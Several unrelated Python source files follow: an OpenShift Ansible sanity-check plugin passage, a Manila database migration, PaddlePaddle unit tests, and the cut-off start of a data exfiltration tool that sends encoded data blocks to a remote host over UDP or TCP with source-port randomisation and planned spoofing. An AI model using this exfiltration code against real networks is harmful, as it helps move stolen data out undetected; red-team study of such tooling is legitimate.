if not value:
continue
if isinstance(value, list):
registries = value
else:
registries = [value]
for reg in registries:
if not any(is_registry_match(reg, pat) for pat in allowed):
unmatched_registries.append((regvar, reg))
if unmatched_registries:
registry_list = ", ".join(["{}:{}".format(n, v) for n, v in unmatched_registries])
raise errors.AnsibleModuleError(
"registry hostnames of the following image prefixes are not whitelisted by image"
" policy configuration: {}".format(registry_list))
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
            if ansible_python['version']['major'] != 2:
                msg = "openshift-ansible requires Python 2 for {}".format(distro)
                raise errors.AnsibleModuleError(msg)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def check_pkg_version_format(self, hostvars, host):
"""Ensure openshift_pkg_version is formatted correctly"""
openshift_pkg_version = self.template_var(hostvars, host, 'openshift_pkg_version')
if not openshift_pkg_version:
return None
regex_to_match = PKG_VERSION_REGEX['re']
res = re.match(regex_to_match, str(openshift_pkg_version))
if res is None:
msg = PKG_VERSION_REGEX['error_msg']
msg = msg.format(str(openshift_pkg_version))
raise errors.AnsibleModuleError(msg)
def check_release_format(self, hostvars, host):
"""Ensure openshift_release is formatted correctly"""
openshift_release = self.template_var(hostvars, host, 'openshift_release')
if not openshift_release:
return None
regex_to_match = RELEASE_REGEX['re']
res = re.match(regex_to_match, str(openshift_release))
if res is None:
msg = RELEASE_REGEX['error_msg']
msg = msg.format(str(openshift_release))
raise errors.AnsibleModuleError(msg)
def network_plugin_check(self, hostvars, host):
"""Ensure only one type of network plugin is enabled"""
res = []
# Loop through each possible network plugin boolean, determine the
# actual boolean value, and append results into a list.
for plugin, default_val in NET_PLUGIN_LIST:
res_temp = self.template_var(hostvars, host, plugin)
if res_temp is None:
res_temp = default_val
res.append(to_bool(res_temp))
if sum(res) not in (0, 1):
plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))
            msg = ("Host Checked: {}. Only one network plugin may be enabled. "
                   "Found: {}".format(host, plugin_str))
raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
"""Checks to ensure openshift_hostname
and openshift_public_hostname
conform to the proper length of 63 characters or less"""
for varname in ('openshift_public_hostname', 'openshift_hostname'):
var_value = self.template_var(hostvars, host, varname)
if var_value and len(var_value) > 63:
msg = '{} must be 63 characters or less'.format(varname)
raise errors.AnsibleModuleError(msg)
def check_session_auth_secrets(self, hostvars, host):
"""Checks session_auth_secrets is correctly formatted"""
sas = self.template_var(hostvars, host,
'openshift_master_session_auth_secrets')
ses = self.template_var(hostvars, host,
'openshift_master_session_encryption_secrets')
# This variable isn't mandatory, only check if set.
if sas is None and ses is None:
return None
if not (
issubclass(type(sas), list) and issubclass(type(ses), list)
) or len(sas) != len(ses):
raise errors.AnsibleModuleError(
'Expects openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets are equal length lists')
for secret in sas:
if len(secret) < 32:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
for secret in ses:
if len(secret) not in [16, 24, 32]:
raise errors.AnsibleModuleError(
'Invalid secret in openshift_master_session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return None
def check_unsupported_nfs_configs(self, hostvars, host):
"""Fails if nfs storage is in use for any components. This check is
ignored if openshift_enable_unsupported_configurations=True"""
enable_unsupported = self.template_var(
hostvars, host, 'openshift_enable_unsupported_configurations')
if to_bool(enable_unsupported):
return None
for storage in STORAGE_KIND_TUPLE:
kind = self.template_var(hostvars, host, storage)
if kind == 'nfs':
raise errors.AnsibleModuleError(
                    'nfs is an unsupported type for {}. '
                    'openshift_enable_unsupported_configurations=True must '
                    'be specified to continue with this configuration.'
                    ''.format(storage))
return None
def check_htpasswd_provider(self, hostvars, host):
"""Fails if openshift_master_identity_providers contains an entry of
kind HTPasswdPasswordIdentityProvider and
openshift_master_manage_htpasswd is False"""
manage_pass = self.template_var(
hostvars, host, 'openshift_master_manage_htpasswd')
if to_bool(manage_pass):
# If we manage the file, we can just generate in the new path.
return None
idps = self.template_var(
hostvars, host, 'openshift_master_identity_providers')
if not idps:
# If we don't find any identity_providers, nothing for us to do.
return None
old_keys = ('file', 'fileName', 'file_name', 'filename')
if not isinstance(idps, list):
            raise errors.AnsibleModuleError(
                "openshift_master_identity_providers is not a list")
for idp in idps:
if idp['kind'] == 'HTPasswdPasswordIdentityProvider':
for old_key in old_keys:
                    if old_key in idp:
raise errors.AnsibleModuleError(
'openshift_master_identity_providers contains a '
'provider of kind==HTPasswdPasswordIdentityProvider '
'and {} is set. Please migrate your htpasswd '
'files to /etc/origin/master/htpasswd and update your '
                            'existing master configs, and remove the {} key '
'before proceeding.'.format(old_key, old_key))
def validate_json_format_vars(self, hostvars, host):
"""Fails if invalid json format are found"""
found_invalid_json = []
for var in JSON_FORMAT_VARIABLES:
if var in hostvars[host]:
json_var = self.template_var(hostvars, host, var)
try:
json.loads(json_var)
except ValueError:
found_invalid_json.append([var, json_var])
except BaseException:
pass
if found_invalid_json:
msg = "Found invalid json format variables:\n"
for item in found_invalid_json:
msg += " {} specified in {} is invalid json format\n".format(item[1], item[0])
raise errors.AnsibleModuleError(msg)
return None
def check_for_oreg_password(self, hostvars, host, odt):
"""Ensure oreg_password is defined when using registry.redhat.io"""
reg_to_check = 'registry.redhat.io'
        err_msg = ("oreg_auth_user and oreg_auth_password must be provided when"
                   " deploying openshift-enterprise")
        err_msg2 = ("oreg_auth_user and oreg_auth_password must be provided when"
                    " using {}".format(reg_to_check))
oreg_password = self.template_var(hostvars, host, 'oreg_auth_password')
if oreg_password is not None:
# A password is defined, so we're good to go.
return None
oreg_url = self.template_var(hostvars, host, 'oreg_url')
if oreg_url is not None:
if reg_to_check in oreg_url:
raise errors.AnsibleModuleError(err_msg2)
elif odt == 'openshift-enterprise':
# We're not using an oreg_url, we're using default enterprise
# registry. We require oreg_auth_user and oreg_auth_password
raise errors.AnsibleModuleError(err_msg)
def run_checks(self, hostvars, host):
"""Execute the hostvars validations against host"""
distro = self.template_var(hostvars, host, 'ansible_distribution')
odt = self.check_openshift_deployment_type(hostvars, host)
self.check_whitelisted_registries(hostvars, host)
self.check_python_version(hostvars, host, distro)
self.check_image_tag_format(hostvars, host, odt)
self.check_pkg_version_format(hostvars, host)
self.check_release_format(hostvars, host)
self.network_plugin_check(hostvars, host)
self.check_hostname_vars(hostvars, host)
self.check_session_auth_secrets(hostvars, host)
self.check_unsupported_nfs_configs(hostvars, host)
self.check_htpasswd_provider(hostvars, host)
check_for_removed_vars(hostvars, host)
self.validate_json_format_vars(hostvars, host)
self.check_for_oreg_password(hostvars, host, odt)
def run(self, tmp=None, task_vars=None):
result = super(ActionModule, self).run(tmp, task_vars)
# self.task_vars holds all in-scope variables.
        # Ignore setting self.task_vars outside of init.
# pylint: disable=W0201
self.task_vars = task_vars or {}
# pylint: disable=W0201
self.last_checked_host = "none"
# pylint: disable=W0201
self.last_checked_var = "none"
# self._task.args holds task parameters.
# check_hosts is a parameter to this plugin, and should provide
# a list of hosts.
check_hosts = self._task.args.get('check_hosts')
if not check_hosts:
msg = "check_hosts is required"
raise errors.AnsibleModuleError(msg)
# We need to access each host's variables
hostvars = self.task_vars.get('hostvars')
if not hostvars:
            msg = "hostvars is undefined or empty"
raise errors.AnsibleModuleError(msg)
# We loop through each host in the provided list check_hosts
for host in check_hosts:
try:
self.run_checks(hostvars, host)
except Exception as uncaught_e:
msg = "last_checked_host: {}, last_checked_var: {};"
msg = msg.format(self.last_checked_host, self.last_checked_var)
msg += str(uncaught_e)
raise errors.AnsibleModuleError(msg)
result["changed"] = False
result["failed"] = False
result["msg"] = "Sanity Checks passed"
return result
def is_registry_match(item, pattern):
"""returns True if the registry matches the given whitelist pattern
Unlike in OpenShift, the comparison is done solely on hostname part
(excluding the port part) since the latter is much more difficult due to
vague definition of port defaulting based on insecure flag. Moreover, most
of the registries will be listed without the port and insecure flag.
"""
item = "schema://" + item.split('://', 1)[-1]
return is_match(urlparse(item).hostname, pattern.rsplit(':', 1)[0])
# taken from https://leetcode.com/problems/wildcard-matching/discuss/17845/python-dp-solution
# (the same source as for openshift/origin/pkg/util/strings/wildcard.go)
def is_match(item, pattern):
"""implements DP algorithm for string matching"""
length = len(item)
if len(pattern) - pattern.count('*') > length:
return False
matches = [True] + [False] * length
for i in pattern:
if i != '*':
for index in reversed(range(length)):
matches[index + 1] = matches[index] and (i == item[index] or i == '?')
else:
for index in range(1, length + 1):
matches[index] = matches[index - 1] or matches[index]
matches[0] = matches[0] and i == '*'
return matches[-1]
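# Illustrative examples of the matching helpers above (hypothetical values):
#   is_match("docker.io", "docker.io")                          -> True
#   is_match("registry.example.com", "*.example.com")           -> True
#   is_match("registry.example.com", "registry.other.io")       -> False
#   is_registry_match("docker.io/library/busybox", "docker.io") -> True
# Only the hostname part ("docker.io") is compared against the pattern.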
|
|
# Copyright 2019 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""add_share_network_subnets_table_and_modify_share_networks_and_servers
Revision ID: 805685098bd2
Revises: 6a3fd2984bc31
Create Date: 2019-05-09 16:28:41.919714
"""
# revision identifiers, used by Alembic.
revision = '805685098bd2'
down_revision = '6a3fd2984bc31'
from alembic import op
from manila.db.migrations import utils
from oslo_log import log
from oslo_utils import uuidutils
import sqlalchemy as sa
LOG = log.getLogger(__name__)
def upgrade():
# New table
try:
share_networks_fk_name = (
"fk_share_network_subnets_share_network_id_share_networks")
availability_zones_fk_name = (
"fk_share_network_subnets_availaility_zone_id_availability_zones")
share_network_subnets_table = op.create_table(
'share_network_subnets',
sa.Column('id', sa.String(36), primary_key=True, nullable=False),
sa.Column('neutron_net_id', sa.String(36), nullable=True),
sa.Column('neutron_subnet_id', sa.String(36), nullable=True),
sa.Column('network_type', sa.String(32), nullable=True),
sa.Column('cidr', sa.String(64), nullable=True),
sa.Column('segmentation_id', sa.Integer, nullable=True),
sa.Column('gateway', sa.String(64), nullable=True),
sa.Column('mtu', sa.Integer, nullable=True),
sa.Column('share_network_id', sa.String(36), sa.ForeignKey(
'share_networks.id', name=share_networks_fk_name)),
sa.Column('ip_version', sa.Integer, nullable=True),
sa.Column('availability_zone_id', sa.String(36),
sa.ForeignKey('availability_zones.id',
name=availability_zones_fk_name)),
sa.Column('created_at', sa.DateTime),
sa.Column('updated_at', sa.DateTime),
sa.Column('deleted_at', sa.DateTime),
sa.Column('deleted', sa.String(36), default='False'),
mysql_engine='InnoDB',
mysql_charset='utf8'
)
except Exception:
LOG.error("Table |%s| not created!", 'share_network_subnets')
raise
share_serves_fk_name = (
"fk_share_servers_share_network_subnet_id_share_network_subnets")
op.add_column(
'share_servers',
sa.Column(
'share_network_subnet_id', sa.String(36),
sa.ForeignKey('share_network_subnets.id',
name=share_serves_fk_name),
)
)
connection = op.get_bind()
share_networks_table = utils.load_table('share_networks', connection)
share_servers_table = utils.load_table('share_servers', connection)
share_network_subnets = []
# Get all share_networks and move all their data to share network subnet
for share_network in connection.execute(share_networks_table.select()):
share_network_subnet = {
'id': uuidutils.generate_uuid(),
'neutron_net_id': share_network.neutron_net_id,
'neutron_subnet_id': share_network.neutron_subnet_id,
'network_type': share_network.network_type,
'cidr': share_network.cidr,
'segmentation_id': share_network.segmentation_id,
'gateway': share_network.gateway,
'mtu': share_network.mtu,
'share_network_id': share_network.id,
'ip_version': share_network.ip_version,
'created_at': share_network.created_at,
'updated_at': share_network.updated_at,
'deleted_at': share_network.deleted_at,
'deleted': share_network.deleted,
}
share_network_subnets.append(share_network_subnet)
# Insertions for the new share network subnets
op.bulk_insert(share_network_subnets_table, share_network_subnets)
    # Update each share server with its corresponding share network subnet id
for sns in share_network_subnets:
share_servers = connection.execute(share_servers_table.select().where(
share_servers_table.c.share_network_id == sns['share_network_id']
))
updated_data = {'share_network_subnet_id': sns['id']}
_update_share_servers(share_servers, updated_data, share_servers_table)
if connection.engine.name == 'mysql':
# Drops necessary constraint from share servers table. Only mysql
# needs constraint handling. Postgresql/sqlite don't
op.drop_constraint("share_servers_ibfk_1", "share_servers",
type_="foreignkey")
op.drop_column('share_servers', 'share_network_id')
op.drop_column('share_networks', 'neutron_net_id')
op.drop_column('share_networks', 'neutron_subnet_id')
op.drop_column('share_networks', 'network_type')
op.drop_column('share_networks', 'segmentation_id')
op.drop_column('share_networks', 'gateway')
op.drop_column('share_networks', 'mtu')
op.drop_column('share_networks', 'cidr')
op.drop_column('share_networks', 'ip_version')
def _update_share_servers(share_servers, updated_data, share_servers_table):
for share_server in share_servers:
# pylint: disable=no-value-for-parameter
op.execute(
share_servers_table.update().where(
share_servers_table.c.id == share_server.id,
).values(updated_data)
)
def retrieve_default_subnet(subnets):
    # NOTE (silvacarlose): A default subnet is the one which doesn't contain
    # an availability zone. If all the subnets contain an az, we can pick
    # any of them, so we simply return the first one.
for subnet in subnets:
if subnet.availability_zone_id is None:
return subnet
return subnets[0] if subnets is not None else None
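# Illustrative example (hypothetical rows): for subnets whose
# availability_zone_id values are ['az1', None, 'az2'], the subnet with None
# is returned; if every subnet carries an az, the first one is used instead.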
def downgrade():
connection = op.get_bind()
# Include again the removed fields in the share network table
op.add_column('share_networks',
sa.Column('neutron_net_id', sa.String(36), nullable=True))
op.add_column('share_networks',
sa.Column('neutron_subnet_id', sa.String(36), nullable=True))
op.add_column('share_networks',
sa.Column('network_type', sa.String(32), nullable=True))
op.add_column('share_networks',
sa.Column('cidr', sa.String(64), nullable=True))
op.add_column('share_networks',
sa.Column('gateway', sa.String(64), nullable=True))
op.add_column('share_networks',
sa.Column('mtu', sa.Integer, nullable=True))
op.add_column('share_networks',
sa.Column('segmentation_id', sa.Integer, nullable=True))
op.add_column('share_networks',
sa.Column('ip_version', sa.Integer, nullable=True))
# Include again the removed field in the share server table
op.add_column('share_servers',
sa.Column('share_network_id', sa.String(36),
sa.ForeignKey('share_networks.id',
name="share_servers_ibfk_1")))
share_networks_table = utils.load_table('share_networks', connection)
share_servers_table = utils.load_table('share_servers', connection)
subnets_table = utils.load_table('share_network_subnets', connection)
for share_network in connection.execute(share_networks_table.select()):
network_subnets = connection.execute(subnets_table.select().where(
subnets_table.c.share_network_id == share_network.id))
default_subnet = retrieve_default_subnet(network_subnets)
if default_subnet is not None:
op.execute(
# pylint: disable=no-value-for-parameter
share_networks_table.update().where(
share_networks_table.c.id == share_network.id,
).values({
'neutron_net_id': default_subnet.neutron_net_id,
'neutron_subnet_id': default_subnet.neutron_subnet_id,
'network_type': default_subnet.network_type,
'cidr': default_subnet.cidr,
'gateway': default_subnet.gateway,
'mtu': default_subnet.mtu,
'segmentation_id': default_subnet.segmentation_id,
'ip_version': default_subnet.ip_version,
})
)
for network_subnet in network_subnets:
share_servers = connection.execute(
share_servers_table.select().where(
share_servers_table.c.share_network_subnet_id ==
network_subnet.id))
updated_data = {'share_network_id': share_network.id}
_update_share_servers(share_servers, updated_data,
share_servers_table)
share_serves_fk_name = (
"fk_share_servers_share_network_subnet_id_share_network_subnets")
if connection.engine.name == 'mysql':
op.drop_constraint(share_serves_fk_name, "share_servers",
type_="foreignkey")
op.drop_column('share_servers', 'share_network_subnet_id')
try:
op.drop_table('share_network_subnets')
except Exception:
LOG.error("Failed to drop 'share_network_subnets' table!")
raise
|
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle
import unittest
from paddle.jit.dy2static.convert_operators import eval_if_exist_else_none
class CallNotExist(paddle.nn.Layer):
def __call__(self):
        # call a non-existent API to trigger an exception
return paddle.nn.not_exist_api
class ForwardNotExist(paddle.nn.Layer):
def forward(self):
return 0
net = ForwardNotExist()
setattr(net, "forward", "A string so that convert forward will fail")
class TestConvertCall(unittest.TestCase):
def test_class_exception(self):
@paddle.jit.to_static
def call_not_exist():
net = CallNotExist()
return net()
with self.assertRaises(AttributeError):
call_not_exist()
@paddle.jit.to_static
def forward_not_exist():
return net()
with self.assertRaises(TypeError):
forward_not_exist()
class TestConvertShapeCompare(unittest.TestCase):
def test_non_variable(self):
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "<=", 3),
True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, ">", 2, "<=", 3),
False)
def error_func():
"""
Function used to test that comparison doesn't run after first False
"""
raise ValueError("Used for test")
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(
1, ">", 2, "<=", lambda: error_func()), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "in",
[1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "not in",
[1, 2, 3]), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "is", 3),
False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(1, "<", 2, "is not",
[1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare([1, 2], "==", [1, 2],
"!=", [1, 2, 3]), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare([1, 2], "!=", [1, 2, 3],
"==", [1, 2]), False)
def test_variable(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
x = paddle.static.data(name='x', shape=[3, 2], dtype='float32')
y = paddle.static.data(name='y', shape=[3, 2], dtype='float32')
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is", x, "is not",
y), True)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is not", x,
"is not", y), False)
self.assertEqual(
paddle.jit.dy2static.convert_shape_compare(x, "is", x, "is", y),
False)
eq_out = paddle.jit.dy2static.convert_shape_compare(x, "==", y)
not_eq_out = paddle.jit.dy2static.convert_shape_compare(x, "!=", y)
long_eq_out = paddle.jit.dy2static.convert_shape_compare(x, "==", x,
"!=", y)
place = paddle.CUDAPlace(0) if paddle.is_compiled_with_cuda(
) else paddle.CPUPlace()
exe = paddle.static.Executor(place)
x_y_eq_out = exe.run(feed={
"x": np.ones([3, 2]).astype(np.float32),
"y": np.ones([3, 2]).astype(np.float32)
},
fetch_list=[eq_out, not_eq_out, long_eq_out])
np.testing.assert_array_equal(
np.array(x_y_eq_out), np.array([[True], [False], [False]]))
set_a_zero = np.ones([3, 2]).astype(np.float32)
set_a_zero[0][0] = 0.0
x_y_not_eq_out = exe.run(
feed={
"x": np.ones([3, 2]).astype(np.float32),
"y": set_a_zero
},
fetch_list=[eq_out, not_eq_out, long_eq_out])
np.testing.assert_array_equal(
np.array(x_y_not_eq_out), np.array([[False], [True], [True]]))
paddle.disable_static()
class TestChooseShapeAttrOrApi(unittest.TestCase):
def test_api_shape_is_none(self):
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([1, 2], None),
[1, 2])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([1], None), [1])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([2, 3, 7], None, 0),
2)
def test_attr_shape_is_int(self):
x = paddle.zeros([1, 3, 5, 7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape[0],
paddle.shape(x)[0]),
1)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape[1],
paddle.shape(x)[1]),
3)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(-1,
paddle.shape(x)[0]),
paddle.shape(x)[0])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(-1,
paddle.shape(x), 0),
paddle.shape(x)[0])
def test_positive_attr_shape(self):
x = paddle.zeros([1, 3, 5, 7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape,
paddle.shape(x)),
x.shape)
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api(x.shape,
paddle.shape(x), 3),
x.shape[3])
def test_negative_attr_shape(self):
x = paddle.zeros([7])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([-1],
paddle.shape(x), 0),
paddle.shape(x)[0])
self.assertEqual(
paddle.jit.dy2static.choose_shape_attr_or_api([-1],
paddle.shape(x)),
paddle.shape(x))
class TestEvaIfExistElseNone(unittest.TestCase):
def test_globals(self):
global x_shape
x_shape = [1, 2, 3]
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
self.assertEqual(eval_if_exist_else_none('x_shape', globals()), x_shape)
del x_shape
def test_enclosing_scope(self):
global x_shape
x_shape = [1, 2, 3]
def foo():
y_shape = [2, 3, 4]
self.assertEqual(
eval_if_exist_else_none('x_shape', globals()), [1, 2, 3])
self.assertEqual(
eval_if_exist_else_none('y_shape', locals()), [2, 3, 4])
foo()
del x_shape
def test_global_in_func(self):
x_shape = [1, 2, 3]
def foo():
global y_shape
y_shape = [2, 3, 4]
self.assertEqual(
eval_if_exist_else_none('y_shape', globals()), [2, 3, 4])
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
self.assertEqual(
eval_if_exist_else_none('x_shape', globals()), None)
del y_shape
foo()
def test_none(self):
def foo():
x_shape = [2, 3, 4]
return x_shape
self.assertEqual(eval_if_exist_else_none('x_shape', locals()), None)
class ShapeLayer(paddle.nn.Layer):
def __init__(self):
super(ShapeLayer, self).__init__()
@paddle.jit.to_static(input_spec=[paddle.static.InputSpec(shape=[None, 1])])
def forward(self, x):
x = paddle.reshape(x, [-1, x.shape[1]])
bs = x.shape[0] # -1
        # to trigger choose_shape_attr_or_api
out = paddle.zeros([bs, 1], dtype='float32')
return out
class TestChooseShapeAttrOrApiWithLayer(unittest.TestCase):
def test_tensor_shape(self):
x = paddle.zeros(shape=[4, 1], dtype='float32')
net = ShapeLayer()
out = net(x)
self.assertTrue(np.array_equal(out.numpy(), x.numpy()))
class TestIfElseNoValue(unittest.TestCase):
def test_else_ret_none(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
z = x - 1
return None
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
return None
out = with_common_value(input_x, False)
self.assertIsNone(out)
out = without_common_value(input_x, False)
self.assertIsNone(out)
def test_else_ret_c(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
z = x - 1
return c
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z
else:
c = x + 1
return c
out = with_common_value(input_x, False)
self.assertListEqual(paddle.tolist(out), paddle.tolist(input_x + 1))
out = without_common_value(input_x, False)
self.assertListEqual(paddle.tolist(out), paddle.tolist(input_x + 1))
y, z = with_common_value(input_x, True)
self.assertListEqual(paddle.tolist(y), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(z), paddle.tolist(input_x + 2))
def test_else_ret_cz(self):
input_x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
@paddle.jit.to_static
def with_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z, 1
else:
c = x + 1
z = x - 1
return c, z
@paddle.jit.to_static
def without_common_value(x, use_cache=False):
if use_cache:
y = x + 1
z = x + 2
return y, z, 1
else:
c = x + 1
d = x - 1
return c, d
c, z = with_common_value(input_x, False)
self.assertListEqual(paddle.tolist(c), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(z), paddle.tolist(input_x - 1))
c, d = without_common_value(input_x, False)
self.assertListEqual(paddle.tolist(c), paddle.tolist(input_x + 1))
self.assertListEqual(paddle.tolist(d), paddle.tolist(input_x - 1))
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
#
# (C) 2016 Bernhards 'Lockout' Blumbergs
# See LICENSE file for usage conditions
#
# Known issues:
# 1. TCP socket reuse problems once the socket has been closed
# 2. UDP socket spoofing, port reuse problems
# 3. Keepalive does not print out the previous buffer before a new one is received
# 4. When sending UDP datagrams as fast as possible they do not arrive at the
# destination (of course). If file is being reassembled, EOF is not received
# 5. Performance degradation when hashing is used (of course)
#
# To be implemented:
# 1. Payload XOR encryption with a shared key
# 2. SSL signing and handshake for SSH, HTTPS traffic spoofing
# 3. Custom SSL certificate provision
# 4. Logging instead of printing verbose messages on the screen
# 5. Multiple IPv6 destination addresses as list for random selection
__version__ = "0.72.1/Devon"
import socket
import sys
import argparse
import base64
import random
import signal
from os import urandom
from time import sleep, time
from math import ceil
from hashlib import md5
def signal_handler(signal, frame):
sys.exit(0)
def hashsum(data):
"""
Calculates the exfiltrated data MD5 hash sum
"""
global hash_sum
if data:
data_hash = int(md5(data).hexdigest(), 16)
hash_sum += data_hash
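# Illustrative note: hash_sum is a running integer sum of per-block MD5
# digests, e.g. hashsum(b"abc") adds int(md5(b"abc").hexdigest(), 16) to it.
# Sender and listener both accumulate this sum, so the final values can be
# compared to verify the exfiltrated stream.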
def send64(data, mode):
"""
Send the specified data to the destination socket
over IPv6 and IPv4 interchangeably
"""
global data_sent
version = ip_version(args.ip_version_select)
if version == 4:
host = args.host4
if version == 6:
host = args.host6
if not args.udp and not args.tcp:
if args.verbose >= 2:
print("[+] Defaulting to UDP protocol")
args.udp = True
if args.udp:
if version == 4:
sock = socket.socket(
socket.AF_INET, # IPv4
socket.SOCK_DGRAM) # UDP socket
if version == 6:
sock = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_DGRAM) # UDP socket
socket.SO_BINDTODEVICE = 25 # If not specified by the system
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
SourcePort = None
IPaddress = None
if args.source_port: # Set UDP source IP:port
SourcePort = args.source_port
if args.randomize_source_port:
SourcePort = random.randint(1024, 65535)
if args.source_ip4 and version == 4:
IPaddress = args.source_ip4
if args.source_ip6 and version == 6:
IPaddress = args.source_ip6
if SourcePort and not IPaddress: # TODO: Binding problems!
sock.bind(('', SourcePort)) # Currently works only
if IPaddress and not SourcePort: # for ports and not IPs
            sock.bind((IPaddress, 0))  # bind() expects an (address, port) tuple
if IPaddress and SourcePort:
sock.bind((IPaddress, SourcePort))
if args.verbose >= 1:
print(
"[*] IPv{0} UDP socket to"
" {1}:{2} via {3}".format(
version, host, port, args.interface)
)
if args.hashing: # Calculate hash before b64
hashsum(data)
if args.verbose >= 2:
print(
"[+] Exfiltrated data block hash sum: {0}".format(
hex(hash_sum))
)
if args.base64:
data = base64.b64encode(data)
if args.verbose >= 3:
print(
"[D] Base64 decoded data {0} bytes:\n{1}".format(
len(base64.b64decode(data)), base64.b64decode(data))
)
sock.sendto(data, (host, port)) # Send UDP datagram
data_sent += len(data)
if args.verbose >= 3:
print(
"[D] Buffer {0} bytes sent:\n{1}".format(
len(data), data)
)
sock.close()
return(True) # Send success
if args.tcp:
if version == 4:
sock = socket.socket(
socket.AF_INET, # IPv4
socket.SOCK_STREAM) # TCP socket
if version == 6:
sock = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_STREAM) # TCP socket
socket.SO_BINDTODEVICE = 25 # If not specified by the system
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
try:
if args.source_port: # Set TCP source port
sock.bind(('', args.source_port)) # TODO: Set source IPv4/6
except OSError as error: # TODO: TCP socket reuse
if args.verbose >= 3:
print("[!] {0}".format(error))
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_REUSEADDR,
1)
# sock.bind(('', args.source_port))
if args.verbose >= 1:
print(
"[*] IPv{0} Connecting to TCP"
" socket {1}:{2} via {3}".format(
version, host, port, args.interface)
)
sock.connect((host, port))
if args.verbose >= 1:
print("[*] TCP socket connected")
if args.hashing: # Calculate hash before b64
hashsum(data)
if args.verbose >= 2:
print(
"[+] Exfiltrated data block hash sum: {0}".format(
hex(hash_sum))
)
if args.base64:
data = base64.b64encode(data)
if args.verbose >= 3:
print(
"[D] Base64 decoded data {0} bytes:\n{1}".format(
